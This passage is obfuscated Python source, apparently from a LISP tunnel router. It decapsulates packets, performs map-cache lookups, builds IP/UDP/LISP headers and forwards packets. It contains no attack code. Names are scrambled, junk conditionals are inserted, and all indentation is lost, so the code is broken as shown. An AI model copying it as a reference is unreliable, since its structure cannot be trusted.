if 35 - 35: ooOoO0o + i1IIi % I1ii11iIi11i % I11i + oO0o
if 17 - 17: i1IIi
if 21 - 21: Oo0Ooo
if 29 - 29: I11i / II111iiii / ooOoO0o * OOooOOo
I111i1i1111 = 0
IIII1 = None
if ( packet [ 9 ] == '\x11' ) :
if ( packet [ 20 : 22 ] == '\x10\xf6' ) : return ( False )
if ( packet [ 22 : 24 ] == '\x10\xf6' ) : return ( False )
if 10 - 10: I1Ii111 / ooOoO0o + i11iIiiIii / Ii1I
if ( packet [ 20 : 22 ] == '\x10\xf5' or packet [ 22 : 24 ] == '\x10\xf5' ) :
IIII1 = packet [ 12 : 16 ]
I111i1i1111 = packet [ 32 : 35 ]
I111i1i1111 = ord ( I111i1i1111 [ 0 ] ) << 16 | ord ( I111i1i1111 [ 1 ] ) << 8 | ord ( I111i1i1111 [ 2 ] )
if ( I111i1i1111 == 0xffffff ) : return ( False )
o00Oo0oooooo ( "Decap" , packet )
packet = packet [ 36 : : ]
if 74 - 74: OOooOOo + O0 + i1IIi - i1IIi + II111iiii
if 83 - 83: I1ii11iIi11i - I1IiiI + OOooOOo
if 5 - 5: Ii1I
o00Oo0oooooo ( "Receive" , packet )
if 46 - 46: IiII
if 45 - 45: ooOoO0o
if 21 - 21: oO0o . I1Ii111 . OOooOOo / Oo0Ooo / I1Ii111
if 17 - 17: OOooOOo / OOooOOo / I11i
ii1 = I1IiIiiIiIII ( packet [ 16 : 20 ] )
ooO . instance_id = I111i1i1111
ooO . address = ii1
if 1 - 1: ooOoO0o % iIii1I11I1II1 + Oo0Ooo . iIii1I11I1II1 % I1IiiI
if 89 - 89: Ii1I
if 76 - 76: ooOoO0o
if 15 - 15: OOooOOo . I11i + OoooooooOO - OoO0O00
if ( ( ii1 & 0xe0000000 ) == 0xe0000000 ) : return ( False )
if 69 - 69: iIii1I11I1II1 . I1ii11iIi11i % ooOoO0o + iIii1I11I1II1 / O0 / I1ii11iIi11i
if 61 - 61: OOooOOo % OOooOOo * o0oOOo0O0Ooo / o0oOOo0O0Ooo
if 75 - 75: IiII . ooOoO0o
if 50 - 50: OoOoOO00
ii1 = ooO
O00o0OO0000oo = lisp . lisp_map_cache . lookup_cache ( ii1 , False )
ii ( ii1 , O00o0OO0000oo )
if ( O00o0OO0000oo == None ) : return ( False )
if 27 - 27: O0
if 79 - 79: o0oOOo0O0Ooo - I11i + o0oOOo0O0Ooo . oO0o
if 28 - 28: i1IIi - iII111i
if 54 - 54: iII111i - O0 % OOooOOo
if 73 - 73: O0 . OoOoOO00 + I1IiiI - I11i % I11i . I11i
if ( IIII1 != None ) :
I11ii1i1 = I1IiIiiIiIII ( packet [ 12 : 16 ] )
iiI1I1 . instance_id = I111i1i1111
iiI1I1 . address = I11ii1i1
ooo0OoOOOOO = lisp . lisp_map_cache . lookup_cache ( iiI1I1 , False )
if ( ooo0OoOOOOO == None ) :
i1iIi1iI , i1I11IiI1iiII , o00oOo0oOoo = lisp . lisp_allow_gleaning ( iiI1I1 , None ,
None )
if ( i1iIi1iI ) : return ( False )
elif ( ooo0OoOOOOO . gleaned ) :
IIII1 = I1IiIiiIiIII ( IIII1 )
if ( ooo0OoOOOOO . rloc_set [ 0 ] . rloc . address != IIII1 ) : return ( False )
if 57 - 57: OoOoOO00 - I1ii11iIi11i
if 50 - 50: I1Ii111 / i1IIi % OoO0O00 . I1IiiI / iII111i
if 88 - 88: OOooOOo . I11i * o0oOOo0O0Ooo . OoOoOO00 / ooOoO0o . I11i
if 10 - 10: o0oOOo0O0Ooo * Oo0Ooo % O0 * iIii1I11I1II1 . O0 % I1ii11iIi11i
if 44 - 44: II111iiii / iII111i / I11i % II111iiii / i1IIi . Ii1I
O00o0OO0000oo . add_recent_source ( iiI1I1 )
if 59 - 59: OoooooooOO
if 47 - 47: ooOoO0o - I1IiiI / II111iiii
if 12 - 12: OOooOOo
if 83 - 83: iII111i . O0 / Oo0Ooo / OOooOOo - II111iiii
if 100 - 100: OoO0O00
if ( O00o0OO0000oo . action == lisp . LISP_NATIVE_FORWARD_ACTION and
O00o0OO0000oo . eid . instance_id == 0 ) :
ii1 . instance_id = lisp . lisp_default_secondary_iid
O00o0OO0000oo = lisp . lisp_map_cache . lookup_cache ( ii1 , False )
ii ( ii1 , O00o0OO0000oo )
if ( O00o0OO0000oo == None ) : return ( False )
if 46 - 46: OoOoOO00 / iIii1I11I1II1 % iII111i . iIii1I11I1II1 * iII111i
if 38 - 38: I1ii11iIi11i - iII111i / O0 . I1Ii111
if 45 - 45: I1Ii111
if 83 - 83: OoOoOO00 . OoooooooOO
if 58 - 58: i11iIiiIii + OoooooooOO % OoooooooOO / IiII / i11iIiiIii
if 62 - 62: OoO0O00 / I1ii11iIi11i
if ( O00o0OO0000oo . action != lisp . LISP_NATIVE_FORWARD_ACTION ) :
if ( O00o0OO0000oo . best_rloc_set == [ ] ) : return ( False )
if 7 - 7: OoooooooOO . IiII
ii1 = O00o0OO0000oo . best_rloc_set [ 0 ]
if ( ii1 . state != lisp . LISP_RLOC_UP_STATE ) : return ( False )
if 53 - 53: Ii1I % Ii1I * o0oOOo0O0Ooo + OoOoOO00
I111i1i1111 = O00o0OO0000oo . eid . instance_id
OoOO = ii1 . translated_port
Oooo00 = ii1 . stats
ii1 = ii1 . rloc
I111iIi1 = ii1 . address
IIII1 = lisp . lisp_myrlocs [ 0 ] . address
if 92 - 92: ooOoO0o
if 22 - 22: Oo0Ooo % iII111i * I1ii11iIi11i / OOooOOo % i11iIiiIii * I11i
if 95 - 95: OoooooooOO - IiII * I1IiiI + OoOoOO00
if 10 - 10: o0oOOo0O0Ooo / i11iIiiIii
o00 = '\x45\x00'
oO = len ( packet ) + 20 + 8 + 8
o00 += chr ( ( oO >> 8 ) & 0xff ) + chr ( oO & 0xff )
o00 += '\xff\xff\x40\x00\x10\x11\x00\x00'
o00 += chr ( ( IIII1 >> 24 ) & 0xff )
o00 += chr ( ( IIII1 >> 16 ) & 0xff )
o00 += chr ( ( IIII1 >> 8 ) & 0xff )
o00 += chr ( IIII1 & 0xff )
o00 += chr ( ( I111iIi1 >> 24 ) & 0xff )
o00 += chr ( ( I111iIi1 >> 16 ) & 0xff )
o00 += chr ( ( I111iIi1 >> 8 ) & 0xff )
o00 += chr ( I111iIi1 & 0xff )
o00 = lisp . lisp_ip_checksum ( o00 )
if 92 - 92: IiII * Oo0Ooo * Oo0Ooo * I1IiiI . iIii1I11I1II1
if 16 - 16: ooOoO0o % OoooooooOO - OOooOOo * Ii1I * I1ii11iIi11i / OoooooooOO
if 31 - 31: I11i . I1Ii111 * ooOoO0o + i11iIiiIii * oO0o
if 93 - 93: I1ii11iIi11i / iIii1I11I1II1 * i1IIi % OoooooooOO * O0 * I11i
Ooooooo = oO - 20
I1IIIiI1I1ii1 = '\xff\x00' if ( OoOO == 4341 ) else '\x10\xf5'
I1IIIiI1I1ii1 += chr ( ( OoOO >> 8 ) & 0xff ) + chr ( OoOO & 0xff )
I1IIIiI1I1ii1 += chr ( ( Ooooooo >> 8 ) & 0xff ) + chr ( Ooooooo & 0xff ) + '\x00\x00'
if 30 - 30: O0 * OoooooooOO
I1IIIiI1I1ii1 += '\x08\xdf\xdf\xdf'
I1IIIiI1I1ii1 += chr ( ( I111i1i1111 >> 16 ) & 0xff )
I1IIIiI1I1ii1 += chr ( ( I111i1i1111 >> 8 ) & 0xff )
I1IIIiI1I1ii1 += chr ( I111i1i1111 & 0xff )
I1IIIiI1I1ii1 += '\x00'
if 38 - 38: IiII - I1ii11iIi11i . OoOoOO00 - I1Ii111 . OoooooooOO
if 89 - 89: iIii1I11I1II1
if 21 - 21: I11i % I11i
if 27 - 27: i11iIiiIii / I1ii11iIi11i
packet = o00 + I1IIIiI1I1ii1 + packet
o00Oo0oooooo ( "Encap" , packet )
else :
oO = len ( packet )
Oooo00 = O00o0OO0000oo . stats
o00Oo0oooooo ( "Send" , packet )
if 84 - 84: Oo0Ooo
if 43 - 43: oO0o - OoooooooOO
if 3 - 3: O0 / iII111i
if 31 - 31: OOooOOo + o0oOOo0O0Ooo . OoooooooOO
if 89 - 89: II111iiii + i1IIi + II111iiii
O00o0OO0000oo . last_refresh_time = time . time ( )
Oooo00 . increment ( oO )
if 7 - 7: O0 % o0oOOo0O0Ooo + I1ii11iIi11i * iII111i - iII111i
if 42 - 42: OoOoOO00 * OoOoOO00 * I1Ii111 . I11i
if 51 - 51: OOooOOo % iIii1I11I1II1 - OoooooooOO % ooOoO0o * iIii1I11I1II1 % OoO0O00
if 99 - 99: oO0o * II111iiii * I1Ii111
ii1 = ii1 . print_address_no_iid ( )
OOo . sendto ( packet , ( ii1 , 0 ) )
if 92 - 92: Oo0Ooo
o0O ( Ooo00O0o , "Fast" )
return ( True )
if 40 - 40: OoOoOO00 / IiII
if 79 - 79: OoO0O00 - iIii1I11I1II1 + Ii1I - I1Ii111
if 93 - 93: II111iiii . I1IiiI - Oo0Ooo + OoOoOO00
if 61 - 61: II111iiii
if 15 - 15: i11iIiiIii % I1IiiI * I11i / I1Ii111
if 90 - 90: iII111i
if 31 - 31: OOooOOo + O0
if 87 - 87: ooOoO0o
def IIIii ( lisp_packet , thread_name ) :
global II1iII1i , O00OooOo00o , IiI11i1IIiiI
global OOo , Ii1IIii11
global oO0oIIII
global iIiiI1
global oo0Ooo0
if 60 - 60: I1ii11iIi11i * I1IiiI
Ooo00O0o = o0O ( None , "RTR" )
if 17 - 17: OOooOOo % Oo0Ooo / I1ii11iIi11i . IiII * OOooOOo - II111iiii
if 41 - 41: Ii1I
if 77 - 77: I1Ii111
if 65 - 65: II111iiii . I1IiiI % oO0o * OoO0O00
if ( oo0Ooo0 ) :
if ( I1Iii1 ( lisp_packet . packet ) ) : return
if 38 - 38: OoOoOO00 / iII111i % Oo0Ooo
if 11 - 11: iII111i - oO0o + II111iiii - iIii1I11I1II1
if 7 - 7: IiII - I11i / II111iiii * Ii1I . iII111i * iII111i
if 61 - 61: I11i % ooOoO0o - OoO0O00 / Oo0Ooo
if 4 - 4: OoooooooOO - i1IIi % Ii1I - OOooOOo * o0oOOo0O0Ooo
Ooooo00o0OoO = lisp_packet
oooo0O0O0o0 = Ooooo00o0OoO . is_lisp_packet ( Ooooo00o0OoO . packet )
if 51 - 51: II111iiii + IiII . i1IIi . I1ii11iIi11i + OoOoOO00 * I1IiiI
if 72 - 72: oO0o + oO0o / II111iiii . OoooooooOO % Ii1I
if 49 - 49: oO0o . OoO0O00 - Oo0Ooo * OoooooooOO . Oo0Ooo
if 2 - 2: OoooooooOO % OOooOOo
if ( oooo0O0O0o0 == False ) :
oOoOOo0oo0 = Ooooo00o0OoO . packet
o0O0Oo00Oo0o , OOOo , OoOO , oo0OOo0O = lisp . lisp_is_rloc_probe ( oOoOOo0oo0 , - 1 )
if ( oOoOOo0oo0 != o0O0Oo00Oo0o ) :
if ( OOOo == None ) : return
lisp . lisp_parse_packet ( II1iII1i , o0O0Oo00Oo0o , OOOo , OoOO , oo0OOo0O )
return
if 39 - 39: OoooooooOO + oO0o % OOooOOo / OOooOOo
if 27 - 27: iII111i . I11i . iIii1I11I1II1 . iIii1I11I1II1
if 20 - 20: o0oOOo0O0Ooo / i1IIi
if 71 - 71: OoOoOO00 . i1IIi
if 94 - 94: OOooOOo . I1Ii111
if 84 - 84: O0 . I11i - II111iiii . ooOoO0o / II111iiii
Ooooo00o0OoO . packet = lisp . lisp_reassemble ( Ooooo00o0OoO . packet )
if ( Ooooo00o0OoO . packet == None ) : return
if 47 - 47: OoooooooOO
if 4 - 4: I1IiiI % I11i
if 10 - 10: IiII . OoooooooOO - OoO0O00 + IiII - O0
if 82 - 82: ooOoO0o + II111iiii
if 39 - 39: oO0o % iIii1I11I1II1 % O0 % OoooooooOO * I1ii11iIi11i + iII111i
if ( lisp . lisp_flow_logging ) : Ooooo00o0OoO = copy . deepcopy ( Ooooo00o0OoO )
if 68 - 68: Oo0Ooo + i11iIiiIii
if 69 - 69: iIii1I11I1II1 * iIii1I11I1II1 * i11iIiiIii + I1IiiI / OOooOOo % Ii1I
if 58 - 58: OOooOOo * o0oOOo0O0Ooo + O0 % OOooOOo
if 25 - 25: Oo0Ooo % I1ii11iIi11i * ooOoO0o
if 6 - 6: iII111i . IiII * OoOoOO00 . i1IIi
if 98 - 98: i1IIi
if 65 - 65: OoOoOO00 / OoO0O00 % IiII
if ( oooo0O0O0o0 ) :
if ( Ooooo00o0OoO . decode ( True , None , lisp . lisp_decap_stats ) == None ) : return
Ooooo00o0OoO . print_packet ( "Receive-({})" . format ( thread_name ) , True )
Ooooo00o0OoO . strip_outer_headers ( )
else :
if ( Ooooo00o0OoO . decode ( False , None , None ) == None ) : return
Ooooo00o0OoO . print_packet ( "Receive-({})" . format ( thread_name ) , False )
if 45 - 45: OoOoOO00
if 66 - 66: OoO0O00
if 56 - 56: O0
if 61 - 61: o0oOOo0O0Ooo / OOooOOo / Oo0Ooo * O0
if 23 - 23: oO0o - OOooOOo + I11i
if 12 - 12: I1IiiI / ooOoO0o % o0oOOo0O0Ooo / i11iIiiIii % OoooooooOO
if 15 - 15: iIii1I11I1II1 % OoooooooOO - Oo0Ooo * Ii1I + I11i
if 11 - 11: iII111i * Ii1I - OoOoOO00
if 66 - 66: OoOoOO00 . i11iIiiIii - iII111i * o0oOOo0O0Ooo + OoooooooOO * I1ii11iIi11i
if 74 - 74: Oo0Ooo
if 61 - 61: Oo0Ooo - I1Ii111 * II111iiii % ooOoO0o * iIii1I11I1II1 + OoO0O00
if 71 - 71: I11i / I11i * oO0o * oO0o / II111iiii
if ( oooo0O0O0o0 and Ooooo00o0OoO . lisp_header . get_instance_id ( ) == 0xffffff ) :
II1I1iiIII1I1 = lisp . lisp_control_header ( )
II1I1iiIII1I1 . decode ( Ooooo00o0OoO . packet )
if ( II1I1iiIII1I1 . is_info_request ( ) ) :
o0Ooo0o0ooo0 = lisp . lisp_info ( )
o0Ooo0o0ooo0 . decode ( Ooooo00o0OoO . packet )
o0Ooo0o0ooo0 . print_info ( )
if 70 - 70: i11iIiiIii % iII111i
if 11 - 11: IiII % I1ii11iIi11i % Ii1I / II111iiii % I1Ii111 - Oo0Ooo
if 96 - 96: I1ii11iIi11i / II111iiii . Ii1I - iII111i * I11i * oO0o
if 76 - 76: Ii1I - II111iiii * OOooOOo / OoooooooOO
if 18 - 18: OoO0O00 + iIii1I11I1II1 - II111iiii - I1IiiI
ooo = o0Ooo0o0ooo0 . hostname if ( o0Ooo0o0ooo0 . hostname != None ) else ""
OOOO0oooo = Ooooo00o0OoO . outer_source
o0o = Ooooo00o0OoO . udp_sport
if ( lisp . lisp_store_nat_info ( ooo , OOOO0oooo , o0o ) ) :
o00oo0 ( II1iII1i , ooo , OOOO0oooo , o0o )
if 51 - 51: O0 - i1IIi / I1IiiI
else :
OOOo = Ooooo00o0OoO . outer_source . print_address_no_iid ( )
oo0OOo0O = Ooooo00o0OoO . outer_ttl
Ooooo00o0OoO = Ooooo00o0OoO . packet
if ( lisp . lisp_is_rloc_probe_request ( Ooooo00o0OoO [ 28 ] ) == False and
lisp . lisp_is_rloc_probe_reply ( Ooooo00o0OoO [ 28 ] ) == False ) : oo0OOo0O = - 1
Ooooo00o0OoO = Ooooo00o0OoO [ 28 : : ]
lisp . lisp_parse_packet ( II1iII1i , Ooooo00o0OoO , OOOo , 0 , oo0OOo0O )
if 37 - 37: o0oOOo0O0Ooo % ooOoO0o
return
if 83 - 83: OOooOOo . I1Ii111 + oO0o - OOooOOo * I1Ii111 / I1Ii111
if 39 - 39: I1Ii111 / Oo0Ooo % OoO0O00 % i11iIiiIii
if 90 - 90: I1Ii111 - OoooooooOO
if 96 - 96: O0 . Ii1I % OoO0O00 * iIii1I11I1II1
if 54 - 54: Ii1I * I1Ii111 - OoooooooOO % I1IiiI + O0
if 6 - 6: I1ii11iIi11i - II111iiii / oO0o + i11iIiiIii + OOooOOo
if ( lisp . lisp_ipc_data_plane ) :
lisp . dprint ( "Drop packet, external data-plane active" )
return
if 54 - 54: Ii1I - I11i - I1Ii111 . iIii1I11I1II1
if 79 - 79: Ii1I . OoO0O00
if 40 - 40: o0oOOo0O0Ooo + Oo0Ooo . o0oOOo0O0Ooo % ooOoO0o
if 15 - 15: Ii1I * Oo0Ooo % I1ii11iIi11i * iIii1I11I1II1 - i11iIiiIii
if 60 - 60: I1IiiI * I1Ii111 % OoO0O00 + oO0o
if ( oooo0O0O0o0 ) :
lisp . lisp_decap_stats [ "good-packets" ] . increment ( len ( Ooooo00o0OoO . packet ) )
if 52 - 52: i1IIi
if 84 - 84: Ii1I / IiII
if 86 - 86: OoOoOO00 * II111iiii - O0 . OoOoOO00 % iIii1I11I1II1 / OOooOOo
if 11 - 11: I1IiiI * oO0o + I1ii11iIi11i / I1ii11iIi11i
if 37 - 37: i11iIiiIii + i1IIi
I1i11II = None
if ( Ooooo00o0OoO . inner_dest . is_mac ( ) ) :
Ooooo00o0OoO . packet = lisp . lisp_mac_input ( Ooooo00o0OoO . packet )
if ( Ooooo00o0OoO . packet == None ) : return
Ooooo00o0OoO . encap_port = lisp . LISP_VXLAN_DATA_PORT
elif ( Ooooo00o0OoO . inner_version == 4 ) :
I1i11II , Ooooo00o0OoO . packet = lisp . lisp_ipv4_input ( Ooooo00o0OoO . packet )
if ( Ooooo00o0OoO . packet == None ) : return
Ooooo00o0OoO . inner_ttl = Ooooo00o0OoO . outer_ttl
elif ( Ooooo00o0OoO . inner_version == 6 ) :
Ooooo00o0OoO . packet = lisp . lisp_ipv6_input ( Ooooo00o0OoO )
if ( Ooooo00o0OoO . packet == None ) : return
Ooooo00o0OoO . inner_ttl = Ooooo00o0OoO . outer_ttl
else :
lisp . dprint ( "Cannot parse inner packet header" )
return
if 31 - 31: oO0o / IiII * o0oOOo0O0Ooo . II111iiii
if 89 - 89: O0
if 2 - 2: I1ii11iIi11i . I1ii11iIi11i + I1ii11iIi11i * o0oOOo0O0Ooo
if 100 - 100: Oo0Ooo % Ii1I / I11i
if 30 - 30: Oo0Ooo - OOooOOo - iII111i
if ( Ooooo00o0OoO . is_trace ( ) ) :
if ( lisp . lisp_trace_append ( Ooooo00o0OoO , ed = "decap" ) == False ) : return
Ooooo00o0OoO . outer_source . afi = lisp . LISP_AFI_NONE
Ooooo00o0OoO . outer_dest . afi = lisp . LISP_AFI_NONE
if 81 - 81: o0oOOo0O0Ooo . OoooooooOO + OOooOOo * ooOoO0o
if 74 - 74: i1IIi + O0 + Oo0Ooo
if 5 - 5: Oo0Ooo * OoOoOO00
if 46 - 46: ooOoO0o
if 33 - 33: iII111i - II111iiii * OoooooooOO - Oo0Ooo - OOooOOo
if 84 - 84: I1Ii111 + Oo0Ooo - OoOoOO00 * OoOoOO00
i1iIi1iI , i1I11IiI1iiII , o00oOo0oOoo = lisp . lisp_allow_gleaning ( Ooooo00o0OoO . inner_source , None ,
Ooooo00o0OoO . outer_source )
if ( i1iIi1iI ) :
Ooo = Ooooo00o0OoO . packet if ( I1i11II ) else None
lisp . lisp_glean_map_cache ( Ooooo00o0OoO . inner_source , Ooooo00o0OoO . outer_source ,
Ooooo00o0OoO . udp_sport , Ooo )
if ( I1i11II ) : return
if 65 - 65: Oo0Ooo / I11i
if 12 - 12: I11i % OoOoOO00
if 48 - 48: iII111i . i11iIiiIii
if 5 - 5: oO0o . I1ii11iIi11i . II111iiii . OoooooooOO
if 96 - 96: i11iIiiIii - OOooOOo % O0 / OoO0O00
if 100 - 100: iII111i / Ii1I - OoooooooOO % II111iiii - I1IiiI % OoOoOO00
oOO00O = Ooooo00o0OoO . inner_dest
if ( oOO00O . is_multicast_address ( ) ) :
if ( oOO00O . is_link_local_multicast ( ) ) :
ooo0OO = lisp . green ( oOO00O . print_address ( ) , False )
lisp . dprint ( "Drop link-local multicast EID {}" . format ( ooo0OO ) )
return
if 15 - 15: OoOoOO00
oOoOoO000OO = False
i1I11IiI1iiII , o00oOo0oOoo , ii11II11 = lisp . lisp_allow_gleaning ( Ooooo00o0OoO . inner_source , oOO00O , None )
else :
oOoOoO000OO , i1I11IiI1iiII , o00oOo0oOoo = lisp . lisp_allow_gleaning ( oOO00O , None , None )
if 70 - 70: iIii1I11I1II1
Ooooo00o0OoO . gleaned_dest = oOoOoO000OO
if 48 - 48: II111iiii * IiII
if 41 - 41: Ii1I % I1ii11iIi11i
if 12 - 12: OOooOOo
if 69 - 69: OoooooooOO + OOooOOo
O00o0OO0000oo = lisp . lisp_map_cache_lookup ( Ooooo00o0OoO . inner_source , Ooooo00o0OoO . inner_dest )
if ( O00o0OO0000oo ) : O00o0OO0000oo . add_recent_source ( Ooooo00o0OoO . inner_source )
if 26 - 26: Oo0Ooo + OOooOOo / OoO0O00 % OoOoOO00 % I1ii11iIi11i + II111iiii
if 31 - 31: I11i % OOooOOo * I11i
if 45 - 45: i1IIi . I1IiiI + OOooOOo - OoooooooOO % ooOoO0o
if 1 - 1: iIii1I11I1II1
if 93 - 93: i1IIi . i11iIiiIii . Oo0Ooo
if ( O00o0OO0000oo and ( O00o0OO0000oo . action == lisp . LISP_NATIVE_FORWARD_ACTION or
O00o0OO0000oo . eid . address == 0 ) ) :
O0O00OOo = lisp . lisp_db_for_lookups . lookup_cache ( Ooooo00o0OoO . inner_source , False )
if ( O0O00OOo and O0O00OOo . secondary_iid ) :
OoOOo = Ooooo00o0OoO . inner_dest
OoOOo . instance_id = O0O00OOo . secondary_iid
if 17 - 17: i1IIi
O00o0OO0000oo = lisp . lisp_map_cache_lookup ( Ooooo00o0OoO . inner_source , OoOOo )
if ( O00o0OO0000oo ) :
Ooooo00o0OoO . gleaned_dest = O00o0OO0000oo . gleaned
O00o0OO0000oo . add_recent_source ( Ooooo00o0OoO . inner_source )
else :
oOoOoO000OO , i1I11IiI1iiII , o00oOo0oOoo = lisp . lisp_allow_gleaning ( OoOOo , None ,
None )
Ooooo00o0OoO . gleaned_dest = oOoOoO000OO
if 1 - 1: ooOoO0o
if 78 - 78: I1ii11iIi11i + I11i - O0
if 10 - 10: I1Ii111 % I1IiiI
if 97 - 97: OoooooooOO - I1Ii111
if 58 - 58: iIii1I11I1II1 + O0
if 30 - 30: ooOoO0o % iII111i * OOooOOo - I1ii11iIi11i * Ii1I % ooOoO0o
if 46 - 46: i11iIiiIii - O0 . oO0o
if 100 - 100: I1IiiI / o0oOOo0O0Ooo * iII111i . O0 / OOooOOo
if 83 - 83: I1Ii111
if ( O00o0OO0000oo == None and oOoOoO000OO ) :
lisp . lprint ( "Suppress Map-Request for gleaned EID {}" . format ( lisp . green ( Ooooo00o0OoO . inner_dest . print_address ( ) , False ) ) )
if 48 - 48: II111iiii * OOooOOo * I1Ii111
return
if 50 - 50: IiII % i1IIi
if 21 - 21: OoooooooOO - iIii1I11I1II1
if ( O00o0OO0000oo == None or O00o0OO0000oo . action == lisp . LISP_SEND_MAP_REQUEST_ACTION ) :
if ( lisp . lisp_rate_limit_map_request ( Ooooo00o0OoO . inner_dest ) ) : return
lisp . lisp_send_map_request ( II1iII1i , iiI1iIiI ,
Ooooo00o0OoO . inner_source , Ooooo00o0OoO . inner_dest , None )
if 93 - 93: oO0o - o0oOOo0O0Ooo % OoOoOO00 . OoOoOO00 - ooOoO0o
if ( Ooooo00o0OoO . is_trace ( ) ) :
OOOO0oooo = oO0oIIII
O00ooOo = "map-cache miss"
lisp . lisp_trace_append ( Ooooo00o0OoO , reason = O00ooOo , lisp_socket = OOOO0oooo )
if 80 - 80: o0oOOo0O0Ooo - OOooOOo + OoooooooOO
return
if 98 - 98: OOooOOo + i1IIi . I1IiiI - II111iiii - o0oOOo0O0Ooo
if 24 - 24: Oo0Ooo - i1IIi + I11i
if 38 - 38: OoooooooOO / I1ii11iIi11i . O0 / i1IIi / Oo0Ooo + iIii1I11I1II1
if 96 - 96: iII111i
if 18 - 18: iII111i * I11i - Ii1I
if 31 - 31: Oo0Ooo - O0 % OoOoOO00 % oO0o
if ( O00o0OO0000oo and O00o0OO0000oo . refresh ( ) ) :
if ( lisp . lisp_rate_limit_map_request ( Ooooo00o0OoO . inner_dest ) == False ) :
lisp . lprint ( "Refresh map-cache entry {}" . format ( lisp . green ( O00o0OO0000oo . print_eid_tuple ( ) , False ) ) )
if 45 - 45: I1ii11iIi11i + II111iiii * i11iIiiIii
lisp . lisp_send_map_request ( II1iII1i , iiI1iIiI ,
Ooooo00o0OoO . inner_source , Ooooo00o0OoO . inner_dest , None )
if 13 - 13: OoooooooOO * oO0o - Ii1I / OOooOOo + I11i + IiII
if 39 - 39: iIii1I11I1II1 - OoooooooOO
if 81 - 81: I1ii11iIi11i - O0 * OoooooooOO
if 23 - 23: II111iiii / oO0o
if 28 - 28: Oo0Ooo * ooOoO0o - OoO0O00
if 19 - 19: I11i
if 67 - 67: O0 % iIii1I11I1II1 / IiII . i11iIiiIii - Ii1I + O0
O00o0OO0000oo . last_refresh_time = time . time ( )
O00o0OO0000oo . stats . increment ( len ( Ooooo00o0OoO . packet ) )
if 27 - 27: OOooOOo
if 89 - 89: II111iiii / oO0o
if 14 - 14: OOooOOo . I1IiiI * ooOoO0o + II111iiii - ooOoO0o + OOooOOo
if 18 - 18: oO0o - o0oOOo0O0Ooo - I1IiiI - I1IiiI
OOooo00 , i1oO , iI , Ii1IIi , i111i11I1ii , o00oO0oOo00 = O00o0OO0000oo . select_rloc ( Ooooo00o0OoO , None )
if 64 - 64: oO0o / i11iIiiIii / o0oOOo0O0Ooo . OoooooooOO
if 11 - 11: I11i % i1IIi
if ( OOooo00 == None and i111i11I1ii == None ) :
if ( Ii1IIi == lisp . LISP_NATIVE_FORWARD_ACTION ) :
lisp . dprint ( "Natively forwarding" )
Ooooo00o0OoO . send_packet ( OOo , Ooooo00o0OoO . inner_dest )
if 16 - 16: I1IiiI + ooOoO0o % OoOoOO00
if ( Ooooo00o0OoO . is_trace ( ) ) :
OOOO0oooo = oO0oIIII
O00ooOo = "not an EID"
lisp . lisp_trace_append ( Ooooo00o0OoO , reason = O00ooOo , lisp_socket = OOOO0oooo )
if 80 - 80: ooOoO0o * O0
o0O ( Ooo00O0o , "RTR" )
return
if 78 - 78: OoOoOO00
O00ooOo = "No reachable RLOCs found"
lisp . dprint ( O00ooOo )
if 20 - 20: iII111i % Ii1I . Ii1I / I11i + OoOoOO00 . Ii1I
if ( Ooooo00o0OoO . is_trace ( ) ) :
OOOO0oooo = oO0oIIII
lisp . lisp_trace_append ( Ooooo00o0OoO , reason = O00ooOo , lisp_socket = OOOO0oooo )
if 53 - 53: OOooOOo + I1IiiI / i11iIiiIii - o0oOOo0O0Ooo * oO0o / OoooooooOO
return
if 89 - 89: iIii1I11I1II1 / I1IiiI - II111iiii / Ii1I . i11iIiiIii . Ii1I
if ( OOooo00 and OOooo00 . is_null ( ) ) :
lisp . dprint ( "Drop action RLOC found" )
if 48 - 48: O0 + O0 . I1Ii111 - ooOoO0o
if ( Ooooo00o0OoO . is_trace ( ) ) :
OOOO0oooo = oO0oIIII
O00ooOo = "drop action"
lisp . lisp_trace_append ( Ooooo00o0OoO , reason = O00ooOo , lisp_socket = OOOO0oooo )
if 63 - 63: oO0o
return
if 71 - 71: i1IIi . Ii1I * iII111i % OoooooooOO + OOooOOo
if 36 - 36: IiII
if 49 - 49: OOooOOo / OoooooooOO / I1IiiI
if 74 - 74: I1Ii111 % I1ii11iIi11i
if 7 - 7: II111iiii
Ooooo00o0OoO . outer_tos = Ooooo00o0OoO . inner_tos
Ooooo00o0OoO . outer_ttl = Ooooo00o0OoO . inner_ttl
if 27 - 27: oO0o . OoooooooOO + i11iIiiIii
if 86 - 86: I11i / o0oOOo0O0Ooo - o0oOOo0O0Ooo + I1ii11iIi11i + oO0o
if 33 - 33: o0oOOo0O0Ooo . iII111i . IiII . i1IIi
if 49 - 49: I1ii11iIi11i
if ( OOooo00 ) :
Ooooo00o0OoO . encap_port = i1oO
if ( i1oO == 0 ) : Ooooo00o0OoO . encap_port = lisp . LISP_DATA_PORT
Ooooo00o0OoO . outer_dest . copy_address ( OOooo00 )
O0oOOo0o = Ooooo00o0OoO . outer_dest . afi_to_version ( )
Ooooo00o0OoO . outer_version = O0oOOo0o
if 50 - 50: iII111i . I1ii11iIi11i . OoO0O00 * I11i + II111iiii % i11iIiiIii
i1i1IiIiIi1Ii = iIiiI1 if ( O0oOOo0o == 4 ) else lisp . lisp_myrlocs [ 1 ]
if 64 - 64: OOooOOo + OoooooooOO * OoooooooOO
Ooooo00o0OoO . outer_source . copy_address ( i1i1IiIiIi1Ii )
if 41 - 41: ooOoO0o . Oo0Ooo + I1IiiI
if ( Ooooo00o0OoO . is_trace ( ) ) :
OOOO0oooo = oO0oIIII
if ( lisp . lisp_trace_append ( Ooooo00o0OoO , rloc_entry = o00oO0oOo00 ,
lisp_socket = OOOO0oooo ) == False ) : return
if 100 - 100: Ii1I + OoO0O00
if 73 - 73: i1IIi - I1Ii111 % ooOoO0o / OoO0O00
if 40 - 40: I1ii11iIi11i * ooOoO0o - I1IiiI / IiII / i11iIiiIii
if 83 - 83: I1ii11iIi11i / I1Ii111 - i11iIiiIii . iIii1I11I1II1 + Oo0Ooo
if 59 - 59: O0 % Oo0Ooo
if ( Ooooo00o0OoO . encode ( iI ) == None ) : return
if ( len ( Ooooo00o0OoO . packet ) <= 1500 ) : Ooooo00o0OoO . print_packet ( "Send" , True )
if 92 - 92: Ii1I % iII111i / I1ii11iIi11i % I1ii11iIi11i * I1IiiI
if 74 - 74: O0 . I1IiiI % OoO0O00 % IiII
if 87 - 87: oO0o - i11iIiiIii
if 78 - 78: i11iIiiIii / iIii1I11I1II1 - o0oOOo0O0Ooo
iIIIIiiIii = Ii1IIii11 if O0oOOo0o == 6 else OOo
